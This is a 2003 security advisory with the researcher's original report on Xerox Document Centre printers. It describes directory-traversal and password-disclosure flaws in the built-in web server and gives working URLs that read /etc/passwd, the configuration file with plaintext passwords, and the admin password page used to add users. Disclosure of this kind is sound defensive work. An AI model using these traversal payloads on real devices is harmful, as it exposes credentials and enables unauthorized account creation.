Xerox Document Centre Lets Remote Users View Files and Add Users
|
|
SecurityTracker Alert ID: 1008523
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Dec 19 2003
|
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Modification of user information
|
Exploit Included: Yes
|
Version(s): Xerox Document Centre 470, 255ST; Xerox_MicroServer Xerox11 0.19.5.509; LynxOS:E2.1_SMP.063.1:02/13/2003
|
Description: Some vulnerabilities were reported in the Xerox Document Centre. A remote user can obtain files from the system and can also add new users.
It is reported that a remote user can request a URL ending with '/..' or '/.' to obtain a binary dump of the requested directory.
A remote user can also traverse the directory structure using the '../' directory traversal characters.
A demonstration exploit
URL is provided:
http://[target]////////../../../../../../etc/passwd
It is also reported that a remote user can request the
following URL to obtain HTTP interface passwords:
http://[target]/srvadmin/usersecure.dhtml
A remote user can also reportedly
create new users via this page by selecting the 'Apply new settings' button when prompted for the administrative password.
The
vendor was reportedly notified on December 15, 2003.
|
Impact: A remote user can view files on the target system.
A remote user can add users to the system.
|
Solution: No solution was available at the time of this entry.
The author of the report indicates that as a workaround, you can disable the http interface and restrict access permissions to trusted hosts.
|
Vendor URL: www.xerox.com/ (Links to External Site)
|
Cause: Access control error, Authentication error, Input validation error
|
Reported By: "J.A. Gutierrez" <spd@shiva.cps.unizar.es>
|
Message History:
None.
|
Source Message Contents
|
Date: Fri, 19 Dec 2003 14:16:57 +0100
From: "J.A. Gutierrez" <spd@shiva.cps.unizar.es>
Subject: Security bug in Xerox Document Centre
|
CONTACT INFORMATION
===============================================================================
Name : J.A. Gutierrez
E-mail : spd@shiva.cps.unizar.es
Reported this to the vendor on Mon Dec 15 2003 using feedback form
at http://www.xerox.com, since I couldn't find a security contact.
TECHNICAL INFO
===============================================================================
Vulnerable systems
- --------------------------------------------------------------
Xerox Document Centre 470, 255ST and maybe others.
Software : Xerox_MicroServer
Version : Xerox11 0.19.5.509
OS : LynxOS:E2.1_SMP.063.1:02/13/2003
Impact
- -----------------------------------------
Remote access to files.
Access to plaintext passwords for the http administration interface.
Access to DES passwords for the operating system.
Read-write access to http users and passwords
Details
- --------------------------------------------------------------
Web server software (self-reports as "Xerox_MicroServer/Xerox11")
for Xerox hardware will return a binary dump of directories when
the requested URL ends with "/.." or "/."; so you can build easily
the directory/file tree from document root and get every file.
At first, you can't get back past document root, since httpd seems
to reject "../" if it would climb back too much:
GET /../.. -> "The request had invalid syntax."
But it does accept "../":
GET /assist/.. -> OK
So maybe it just counts "../" groups and compares the count
to the total number of "/" ? Let's try:
GET /assist/////.././../../. -> OK
Examples:
- http://xerox_dc_470.example.com/..
00 00 00 00 45 00 0c 00 01 2e 00 00 00 00 00 00 43 ...E...........C
10 00 0c 00 02 2e 2e 00 00 00 00 00 46 00 10 00 06 ...........F....
20 63 6f 6e 66 69 67 00 00 00 00 00 48 00 10 00 06 config.....H....
30 68 74 64 6f 63 73 00 00 00 00 02 26 00 10 00 04 htdocs.....&....
40 6a 6f 62 73 00 00 00 00 00 00 02 29 01 b8 00 04 jobs.......)....
50 6c 61 6e 67 00 00 00 00 00 00 00 00 00 00 00 00 lang............
60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- http://xerox_dc_470.example.com////../../data/config/microsrv.cfg
and you get full configuration, including plain text passwords.
- http://xerox_dc_470.example.com////////../../../../../../etc/passwd
and you get a passwd file to run crack on
Even without having to use ".." you can get the plain text passwords
for the HTTP interface using
http://xerox_dc_470.example.com/srvadmin/usersecure.dhtml
From that page, you can even create new users; when you press
"Apply new settings" button prompts for admin password (the
same you just have read in that same page)
Probably you could use this to steal documents from the printer
queue, but I haven't verified this.
Note: to test this vulnerability do not use any "smart" http client
which will rewrite the URL internally to suppress '../' parts.
Workaround
- ---------------------------------------------------------------------
- Disable http interface.
- Restrict access permissions to trusted hosts
===============================================================================
--
finger spd@shiva.cps.unizar.es for PGP /
.mailcap tip of the day: / La vida es una carcel
application/ms-tnef; cat '%s' > /dev/null / con las puertas abiertas
text/x-vcard; cat '%s' > /dev/null / (A. Calamaro)
|
|
